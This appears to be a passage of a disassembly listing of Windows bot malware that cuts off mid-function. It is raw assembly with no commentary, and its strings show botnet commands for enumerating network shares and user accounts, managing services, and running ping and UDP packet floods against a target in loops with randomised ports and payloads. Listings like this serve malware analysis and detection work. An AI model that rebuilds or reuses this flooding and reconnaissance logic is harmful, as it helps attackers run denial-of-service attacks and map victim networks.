; ---------------------------------------------------------------------------
loc_406585: ; CODE XREF: sub_40649E+B5�j
sub eax, 8CAh
jz short loc_4065B7
sub eax, 17h
jz short loc_4065B0
sub eax, 25h
jz short loc_4065A9
sub eax, 29h
jz short loc_4065A2
loc_40659B: ; CODE XREF: sub_40649E+31�j
; sub_40649E+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065A2: ; CODE XREF: sub_40649E+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065A9: ; CODE XREF: sub_40649E+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065B0: ; CODE XREF: sub_40649E+BE�j
; sub_40649E+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065B7: ; CODE XREF: sub_40649E+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_4065BC: ; CODE XREF: sub_40649E+3C�j
; sub_40649E+46�j ...
push offset dword_4338C8
call sub_412BB5
pop ecx
pop ecx
mov eax, offset dword_4338C8
retn
sub_40649E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4065CE proc near ; CODE XREF: sub_4078FA+1DEF�p
var_71C = byte ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_4140FA
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call ds:dword_41F0B0 ; GetComputerNameA
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_4140FA
lea eax, [ebp+var_71C]
push eax
call sub_413FEE
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_4334B4
test eax, eax
jnz short loc_40665E
push offset aNetMessageSent ; "[NET]: Message sent successfully."
mov esi, offset dword_433928
push esi
call sub_412BB5
pop ecx
pop ecx
jmp short loc_406685
; ---------------------------------------------------------------------------
loc_40665E: ; CODE XREF: sub_4065CE+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_40649E
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
mov esi, offset dword_433928
push esi
call sub_412BB5
add esp, 14h
loc_406685: ; CODE XREF: sub_4065CE+8E�j
mov eax, esi
pop esi
leave
retn
sub_4065CE endp
; =============== S U B R O U T I N E =======================================
sub_40668A proc near ; CODE XREF: sub_4078FA:loc_4094EC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4066E0
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_42A400[esi]
push edi
push eax
call sub_405BA9
add esp, 14h
test eax, eax
jnz short loc_4066D2
push edi
push off_42A3FC[esi]
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
loc_4066C2: ; CODE XREF: sub_40668A+54�j
mov esi, offset dword_433B28
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4066FD
; ---------------------------------------------------------------------------
loc_4066D2: ; CODE XREF: sub_40668A+2A�j
call sub_405C4B
push eax
push edi
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
jmp short loc_4066C2
; ---------------------------------------------------------------------------
loc_4066E0: ; CODE XREF: sub_40668A+C�j
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433B28
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4066FD: ; CODE XREF: sub_40668A+46�j
pop edi
mov eax, esi
pop esi
retn
sub_40668A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406702 proc near ; CODE XREF: sub_4078FA:loc_4095D0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40679A
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40672B
dec eax
jnz short loc_40677A
push edi
push 0
call sub_406032
pop ecx
pop ecx
jmp short loc_406776
; ---------------------------------------------------------------------------
loc_40672B: ; CODE XREF: sub_406702+18�j
cmp [ebp+arg_8], 0
jnz short loc_406768
push 24h
push edi
call sub_413F30
test eax, eax
pop ecx
pop ecx
jnz short loc_406768
push 57h
pop eax
loc_406742: ; CODE XREF: sub_406702+76�j
call sub_40649E
push eax
push edi
lea eax, [esi+esi*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433D28
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_412BB5
add esp, 14h
jmp short loc_4067BA
; ---------------------------------------------------------------------------
loc_406768: ; CODE XREF: sub_406702+2D�j
; sub_406702+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_405FC7
add esp, 0Ch
loc_406776: ; CODE XREF: sub_406702+27�j
test eax, eax
jnz short loc_406742
loc_40677A: ; CODE XREF: sub_406702+1B�j
push edi
lea eax, [esi+esi*2]
push off_42A3FC[eax*4]
mov esi, offset dword_433D28
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4067BA
; ---------------------------------------------------------------------------
loc_40679A: ; CODE XREF: sub_406702+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433D28
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4067BA: ; CODE XREF: sub_406702+64�j
; sub_406702+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_406702 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067C0 proc near ; CODE XREF: sub_4078FA+1D03�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_405F05
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_4045DD
add esp, 18h
loc_4067F9: ; CODE XREF: sub_4067C0+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_4335A0
mov ebx, eax
cmp ebx, esi
jz short loc_40685A
cmp ebx, 0EAh
jz short loc_40685A
push ebx
call sub_40649E
push eax
lea eax, [ebp+var_214]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
jmp short loc_4068C7
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_4067C0+5D�j
; sub_4067C0+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_4068BE
mov esi, [ebp+var_8]
add esi, 14h
loc_406868: ; CODE XREF: sub_4067C0+FA�j
push dword ptr [esi+10h]
call dword_433598
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40687F
mov eax, offset aNo ; "No"
loc_40687F: ; CODE XREF: sub_4067C0+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_406868
xor esi, esi
loc_4068BE: ; CODE XREF: sub_4067C0+A0�j
push [ebp+var_8]
call dword_4334D8
loc_4068C7: ; CODE XREF: sub_4067C0+98�j
cmp ebx, 0EAh
jz loc_4067F9
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4067C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068DF proc near ; CODE XREF: sub_4078FA:loc_409672�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_406982
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_406921
dec eax
jz short loc_406916
dec eax
jnz short loc_40693C
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_4060D0
add esp, 14h
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406916: ; CODE XREF: sub_4068DF+1D�j
push ebx
push edi
call sub_4060AF
pop ecx
pop ecx
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406921: ; CODE XREF: sub_4068DF+1A�j
cmp [ebp+arg_8], edi
jz short loc_406935
push [ebp+arg_8]
push ebx
push edi
call sub_406055
add esp, 0Ch
jmp short loc_406938
; ---------------------------------------------------------------------------
loc_406935: ; CODE XREF: sub_4068DF+45�j
push 57h
pop eax
loc_406938: ; CODE XREF: sub_4068DF+35�j
; sub_4068DF+40�j ...
cmp eax, edi
jnz short loc_40695C
loc_40693C: ; CODE XREF: sub_4068DF+20�j
push ebx
lea eax, [esi+esi*2]
push off_42A3FC[eax*4]
mov esi, offset dword_433F28
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4069A2
; ---------------------------------------------------------------------------
loc_40695C: ; CODE XREF: sub_4068DF+5B�j
call sub_40649E
push eax
push ebx
lea eax, [esi+esi*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433F28
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_412BB5
add esp, 14h
jmp short loc_4069A2
; ---------------------------------------------------------------------------
loc_406982: ; CODE XREF: sub_4068DF+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433F28
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4069A2: ; CODE XREF: sub_4068DF+7B�j
; sub_4068DF+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_4068DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069A9 proc near ; CODE XREF: sub_4078FA+1DA5�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_405F05
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_4045DD
add esp, 18h
push ebx
loc_4069E8: ; CODE XREF: sub_4069A9+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_433480
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_406A47
cmp eax, 0EAh
jz short loc_406A47
push eax
call sub_40649E
push eax
lea eax, [ebp+var_21C]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 24h
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406A47: ; CODE XREF: sub_4069A9+62�j
; sub_4069A9+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_406ACB
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_406AB8
loc_406A55: ; CODE XREF: sub_4069A9+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_406A94
push dword ptr [edi]
push offset aS_2 ; " %S"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_406A55
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406A94: ; CODE XREF: sub_4069A9+B4�j
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 1Ch
loc_406AB8: ; CODE XREF: sub_4069A9+9C�j
; sub_4069A9+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_406ACB
push edi
call dword_4334D8
xor edi, edi
mov [ebp+var_4], edi
loc_406ACB: ; CODE XREF: sub_4069A9+A3�j
; sub_4069A9+114�j
cmp [ebp+var_10], 0EAh
jz loc_4069E8
cmp edi, esi
pop ebx
jz short loc_406AE4
push edi
call dword_4334D8
loc_406AE4: ; CODE XREF: sub_4069A9+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_412BB5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_4069A9 endp
; =============== S U B R O U T I N E =======================================
sub_406B1D proc near ; CODE XREF: sub_4028A8+7D�p
; sub_4038B7+4A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_433514
cmp eax, 0FFFFFFFFh
jnz short locret_406B45
push [esp+arg_0]
call dword_433500
test eax, eax
jnz short loc_406B3E
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_406B3E: ; CODE XREF: sub_406B1D+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_406B45: ; CODE XREF: sub_406B1D+D�j
retn
sub_406B1D endp
; =============== S U B R O U T I N E =======================================
sub_406B46 proc near ; CODE XREF: sub_40779B+138�p
mov ecx, dword_433584
xor eax, eax
test ecx, ecx
jz short locret_406B54
jmp ecx
; ---------------------------------------------------------------------------
locret_406B54: ; CODE XREF: sub_406B46+A�j
retn
sub_406B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_406B55 proc near ; CODE XREF: sub_4078FA:loc_40BA88�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
xor eax, eax
push edi
inc eax
push eax
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+var_8]
xor ebx, ebx
push eax
push ebx
xor esi, esi
mov [ebp+78h+var_8], ebx
call dword_4334AC
mov ecx, eax
sub ecx, ebx
jz short loc_406BE5
sub ecx, 32h
jz loc_406C2C
sub ecx, 48h
jz short loc_406BB0
sub ecx, 6Eh
jz short loc_406BA9
loc_406B95: ; CODE XREF: sub_406B55+8E�j
push eax
lea eax, [ebp+78h+var_88]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_406C0D
; ---------------------------------------------------------------------------
loc_406BA9: ; CODE XREF: sub_406B55+3E�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_406C02
; ---------------------------------------------------------------------------
loc_406BB0: ; CODE XREF: sub_406B55+39�j
push [ebp+78h+var_8]
call sub_41344D
pop ecx
mov ecx, [ebp+78h+var_8]
mov edx, ecx
mov esi, eax
shr ecx, 2
xor eax, eax
mov edi, esi
rep stosd
mov ecx, edx
and ecx, 3
cmp esi, ebx
rep stosb
jz short loc_406BFD
push 1
lea eax, [ebp+78h+var_8]
push eax
push esi
call dword_4334AC
cmp eax, ebx
jnz short loc_406B95
loc_406BE5: ; CODE XREF: sub_406B55+2B�j
cmp [esi], ebx
jbe short loc_406C1A
lea edi, [esi+4]
loc_406BEC: ; CODE XREF: sub_406B55+A4�j
push edi
call dword_43350C
inc ebx
add edi, 18h
cmp ebx, [esi]
jb short loc_406BEC
jmp short loc_406C1A
; ---------------------------------------------------------------------------
loc_406BFD: ; CODE XREF: sub_406B55+7D�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_406C02: ; CODE XREF: sub_406B55+59�j
; sub_406B55+DC�j
lea eax, [ebp+78h+var_88]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_406C0D: ; CODE XREF: sub_406B55+52�j
lea eax, [ebp+78h+var_88]
push eax
mov [ebp+78h+var_4], ebx
call sub_401C33
pop ecx
loc_406C1A: ; CODE XREF: sub_406B55+92�j
; sub_406B55+A6�j
push esi
call sub_412FE4
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_406B55+30�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_406C02
sub_406B55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C33 proc near ; CODE XREF: sub_401141+21B�p
; sub_401141+32A�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
mov [ebp+var_4], 10h
call dword_433418
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset dword_434128
push esi
call sub_412BB5
add esp, 18h
pop edi
mov eax, esi
pop esi
leave
retn
sub_406C33 endp
; =============== S U B R O U T I N E =======================================
sub_406C89 proc near ; CODE XREF: sub_41046C+437�p
; sub_41046C+48D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_406CB4
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_406CA7: ; CODE XREF: sub_406C89+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_406CA7
pop edi
jmp short loc_406CB8
; ---------------------------------------------------------------------------
loc_406CB4: ; CODE XREF: sub_406C89+A�j
mov esi, [esp+4+arg_0]
loc_406CB8: ; CODE XREF: sub_406C89+29�j
test ecx, ecx
jz short loc_406CC1
movzx eax, byte ptr [esi]
add edx, eax
loc_406CC1: ; CODE XREF: sub_406C89+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_406C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CD9 proc near ; DATA XREF: sub_4078FA+50A8�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+var_144]
rep movsd
inc ebx
mov [eax+120h], ebx
call dword_4334F0
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_433514
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_406D32
lea eax, [ebp+var_C0]
push eax
call dword_433500
test eax, eax
jz short loc_406D38
loc_406D32: ; CODE XREF: sub_406CD9+46�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_406D96
loc_406D38: ; CODE XREF: sub_406CD9+57�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_28], 0
jnz short loc_406D7A
push 0
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4045DD
add esp, 14h
loc_406D7A: ; CODE XREF: sub_406CD9+7E�j
lea eax, [ebp+var_344]
push eax
call sub_401C33
push [ebp+var_30]
call sub_4111AE
pop ecx
pop ecx
push ebx
jmp loc_406E5B
; ---------------------------------------------------------------------------
loc_406D96: ; CODE XREF: sub_406CD9+5D�j
test eax, eax
jz short loc_406DA6
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_406DA9
; ---------------------------------------------------------------------------
loc_406DA6: ; CODE XREF: sub_406CD9+BF�j
mov [ebp+var_4], esi
loc_406DA9: ; CODE XREF: sub_406CD9+CB�j
push 7
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
cmp [ebp+var_3C], eax
jle short loc_406DC4
mov [ebp+var_3C], eax
loc_406DC4: ; CODE XREF: sub_406CD9+E6�j
cmp [ebp+var_38], ebx
jge short loc_406DCC
mov [ebp+var_38], ebx
loc_406DCC: ; CODE XREF: sub_406CD9+EE�j
xor edi, edi
xor esi, esi
cmp [ebp+var_40], edi
jle short loc_406DFB
loc_406DD5: ; CODE XREF: sub_406CD9+120�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push edi
push [ebp+var_3C]
lea eax, [ebp+var_10320]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_433588
inc esi
cmp esi, [ebp+var_40]
jl short loc_406DD5
loc_406DFB: ; CODE XREF: sub_406CD9+FA�j
push [ebp+arg_0]
call dword_433524
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_28], edi
jnz short loc_406E44
push edi
push [ebp+var_2C]
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_4045DD
add esp, 14h
loc_406E44: ; CODE XREF: sub_406CD9+149�j
lea eax, [ebp+var_344]
push eax
call sub_401C33
push [ebp+var_30]
call sub_4111AE
pop ecx
pop ecx
push edi
loc_406E5B: ; CODE XREF: sub_406CD9+B8�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_406CD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E62 proc near ; DATA XREF: sub_4078FA+5201�o
var_10316 = byte ptr -10316h
var_10314 = byte ptr -10314h
var_338 = byte ptr -338h
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10314h
call sub_412DD0
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_138]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
push 11h
push 2
push 2
call dword_4334A0
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_14], 2
call dword_433514
xor edi, edi
xor ecx, ecx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_406F3D
lea eax, [ebp+var_B4]
push eax
call dword_433500
mov ecx, eax
cmp ecx, edi
jnz short loc_406F3D
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_406F21
push edi
push [ebp+var_20]
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+var_138]
call sub_4045DD
add esp, 14h
loc_406F21: ; CODE XREF: sub_406E62+9D�j
lea eax, [ebp+var_338]
push eax
call sub_401C33
push [ebp+var_24]
call sub_4111AE
pop ecx
pop ecx
push esi
jmp loc_407076
; ---------------------------------------------------------------------------
loc_406F3D: ; CODE XREF: sub_406E62+6A�j
; sub_406E62+7D�j
cmp [ebp+var_28], edi
jge short loc_406F45
mov [ebp+var_28], edi
loc_406F45: ; CODE XREF: sub_406E62+DE�j
mov eax, 0FFFFh
cmp [ebp+var_28], eax
jle short loc_406F52
mov [ebp+var_28], eax
loc_406F52: ; CODE XREF: sub_406E62+EB�j
cmp ecx, edi
jz short loc_406F5D
mov eax, [ecx+0Ch]
mov eax, [eax]
jmp short loc_406F60
; ---------------------------------------------------------------------------
loc_406F5D: ; CODE XREF: sub_406E62+F2�j
lea eax, [ebp+arg_0]
loc_406F60: ; CODE XREF: sub_406E62+F9�j
cmp [ebp+var_28], edi
mov eax, [eax]
mov [ebp+var_10], eax
jnz short loc_406F7B
call sub_412D71
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_406F7E
; ---------------------------------------------------------------------------
loc_406F7B: ; CODE XREF: sub_406E62+106�j
push [ebp+var_28]
loc_406F7E: ; CODE XREF: sub_406E62+117�j
call dword_4335EC
mov [ebp+var_12], ax
mov eax, [ebp+var_34]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_2C], edi
mov [ebp+var_34], eax
jnz short loc_406F9C
mov [ebp+var_2C], esi
loc_406F9C: ; CODE XREF: sub_406E62+135�j
xor esi, esi
cmp [ebp+var_30], edi
jle short loc_407017
loc_406FA3: ; CODE XREF: sub_406E62+159�j
call sub_412D71
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_30]
mov [ebp+esi-10315h], dl
jl short loc_406FA3
jmp short loc_407017
; ---------------------------------------------------------------------------
loc_406FBF: ; CODE XREF: sub_406E62+1B8�j
dec [ebp+var_34]
push 0Bh
pop esi
loc_406FC5: ; CODE XREF: sub_406E62+195�j
push 10h
lea eax, [ebp+var_14]
push eax
push edi
call sub_412D71
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_30]
sub eax, edx
push eax
lea eax, [ebp+var_10314]
push eax
push [ebp+var_4]
call dword_433470
push [ebp+var_2C]
call ds:dword_41F000 ; Sleep
dec esi
jnz short loc_406FC5
cmp [ebp+var_28], edi
jnz short loc_407017
call sub_412D71
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4335EC
mov [ebp+var_12], ax
loc_407017: ; CODE XREF: sub_406E62+13F�j
; sub_406E62+15B�j ...
cmp [ebp+var_34], edi
jg short loc_406FBF
dec [ebp+var_34]
lea eax, [ebp+var_B4]
push eax
lea eax, [ebp+var_338]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_1C], edi
jnz short loc_40705F
push edi
